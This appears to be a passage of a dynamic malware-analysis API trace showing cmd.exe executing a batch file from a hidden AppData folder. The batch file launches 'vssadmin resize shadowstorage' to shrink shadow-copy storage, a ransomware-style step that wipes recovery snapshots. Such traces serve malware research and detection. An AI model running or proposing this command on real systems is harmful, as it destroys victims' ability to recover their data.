0xfffffffe [0035.487] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.488] SetConsoleInputExeNameW () returned 0x1 [0035.488] GetConsoleOutputCP () returned 0x1b5 [0035.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0035.488] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0035.488] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.488] SetFilePointer (in: hFile=0x78, lDistanceToMove=263, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x107 [0035.488] GetProcessHeap () returned 0x3e0000 [0035.488] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7540 | out: hHeap=0x3e0000) returned 1 [0035.488] GetProcessHeap () returned 0x3e0000 [0035.488] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7410 | out: hHeap=0x3e0000) returned 1 [0035.488] GetProcessHeap () returned 0x3e0000 [0035.488] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e8 | out: hHeap=0x3e0000) returned 1 [0035.488] GetProcessHeap () returned 0x3e0000 [0035.488] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.489] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.489] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x107 [0035.489] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x17ba, lpOverlapped=0x0) returned 1 [0035.489] SetFilePointer (in: hFile=0x78, lDistanceToMove=324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x144 [0035.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\ned\r\n") returned 61 [0035.489] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.489] GetFileType (hFile=0x78) returned 0x1 [0035.489] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.489] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x144 [0035.489] GetProcessHeap () returned 0x3e0000 [0035.489] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.490] GetProcessHeap () returned 0x3e0000 [0035.490] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.490] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.490] GetProcessHeap () returned 0x3e0000 [0035.490] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.490] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f8258 [0035.490] _tell (_FileHandle=3) returned 324 [0035.490] _close (_FileHandle=3) returned 0 [0035.490] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.490] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.490] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.490] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.490] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.490] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.490] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.490] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.491] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.491] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.491] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.491] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.491] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.491] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.491] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.491] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.491] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.491] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.491] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.491] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.491] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.491] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.491] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.491] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.491] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.491] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.491] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.491] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.491] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.491] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.491] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.491] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.491] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.491] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.491] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.491] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.491] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.491] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.491] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.491] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.491] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.491] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.492] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.492] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.492] SetErrorMode (uMode=0x0) returned 0x1 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.492] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.492] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.492] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.492] GetProcessHeap () returned 0x3e0000 [0035.492] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.492] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.492] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.493] GetLastError () returned 0x2 [0035.493] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.493] GetLastError () returned 0x2 [0035.493] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.493] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.493] GetLastError () returned 0x2 [0035.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.493] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.493] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.493] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.493] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f7250 [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.494] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.494] SetErrorMode (uMode=0x0) returned 0x1 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.494] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.494] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e0 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7408 [0035.494] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7408, Size=0x122) returned 0x3f7408 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7408) returned 0x122 [0035.494] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7538 [0035.494] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7538, Size=0x76) returned 0x3f7538 [0035.494] GetProcessHeap () returned 0x3e0000 [0035.494] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7538) returned 0x76 [0035.494] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.494] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.495] GetLastError () returned 0x2 [0035.495] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.495] GetLastError () returned 0x2 [0035.495] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.495] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.495] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.495] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.495] GetLastError () returned 0x2 [0035.495] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.495] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.495] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.495] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.495] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.496] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.496] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.496] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.496] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.496] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.497] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.497] GetProcessHeap () returned 0x3e0000 [0035.497] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.497] GetProcessHeap () returned 0x3e0000 [0035.497] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.497] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.497] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa38, dwThreadId=0xa3c)) returned 1 [0035.501] CloseHandle (hObject=0x78) returned 1 [0035.501] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.501] GetProcessHeap () returned 0x3e0000 [0035.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.502] GetEnvironmentStringsW () returned 0x3f8408* [0035.502] GetProcessHeap () returned 0x3e0000 [0035.502] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.502] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.502] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0035.629] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.629] CloseHandle (hObject=0x74) returned 1 [0035.629] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.629] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.629] GetProcessHeap () returned 0x3e0000 [0035.629] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.629] GetEnvironmentStringsW () returned 0x3f8408* [0035.629] GetProcessHeap () returned 0x3e0000 [0035.629] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.629] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.629] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.630] GetProcessHeap () returned 0x3e0000 [0035.630] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.630] GetEnvironmentStringsW () returned 0x3f8408* [0035.630] GetProcessHeap () returned 0x3e0000 [0035.630] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.630] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.630] GetProcessHeap () returned 0x3e0000 [0035.630] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.630] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.630] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.630] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.630] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.630] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.630] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.630] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.630] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.630] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.631] SetConsoleInputExeNameW () returned 0x1 [0035.631] GetConsoleOutputCP () returned 0x1b5 [0035.631] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.631] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.631] _open_osfhandle 